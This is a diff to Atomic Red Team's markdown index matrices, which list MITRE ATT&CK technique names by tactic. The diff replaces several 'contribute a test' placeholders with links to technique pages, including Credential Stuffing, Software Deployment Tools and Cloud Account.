-| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
+| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
 | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -39,7 +39,7 @@
 |  |  | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) |  |  |  |  |  | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | [Trap](../../T1546.005/T1546.005.md) |  | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) |  | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
-|  |  | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  | [Web Protocols](../../T1071.001/T1071.001.md) |  |
+|  |  | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) |  |  |  |  |  | [Web Protocols](../../T1071.001/T1071.001.md) |  |
 |  |  | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  |  |  | [Obfuscated Files or Information](../../T1027/T1027.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |

atomics/Indexes/Matrices/matrix.md

@@ -6,11 +6,11 @@
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
 | [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
-| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Administration Command](../../T1609/T1609.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container API](../../T1552.007/T1552.007.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | [External Remote Services](../../T1133/T1133.md) | [Cron](../../T1053.003/T1053.003.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RDP Hijacking](../../T1563.002/T1563.002.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | [Domain Account](../../T1087.002/T1087.002.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | [Local Accounts](../../T1078.003/T1078.003.md) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Domain Trust Discovery](../../T1482/T1482.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -18,9 +18,9 @@
 | Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DCSync](../../T1003.006/T1003.006.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
 | Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Internal Defacement](../../T1491.001/T1491.001.md) |
 | Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchd](../../T1053.004/T1053.004.md) | [Browser Extensions](../../T1176/T1176.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | [Software Deployment Tools](../../T1072/T1072.md) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-|  | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) |  | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
+|  | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cloud Account](../../T1136.003/T1136.003.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) |  | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
 |  | [Native API](../../T1106/T1106.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) |  | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | [PowerShell](../../T1059.001/T1059.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Remote Management](../../T1021.006/T1021.006.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
@@ -30,7 +30,7 @@
 |  | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) |  | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  | [Service Execution](../../T1569.002/T1569.002.md) | [Cron](../../T1053.003/T1053.003.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Software Discovery](../../T1518/T1518.md) |  | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Non-Standard Port](../../T1571/T1571.md) |  |
 |  | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Checks](../../T1497.001/T1497.001.md) |  | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
-|  | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Deploy Container](../../T1610/T1610.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) |  | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
+|  | [Software Deployment Tools](../../T1072/T1072.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Deploy Container](../../T1610/T1610.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) |  | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Direct Volume Access](../../T1006/T1006.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1136.002/T1136.002.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | [Screen Capture](../../T1113/T1113.md) |  | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  | [Systemd Timers](../../T1053.006/T1053.006.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) |  | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
@@ -43,7 +43,7 @@
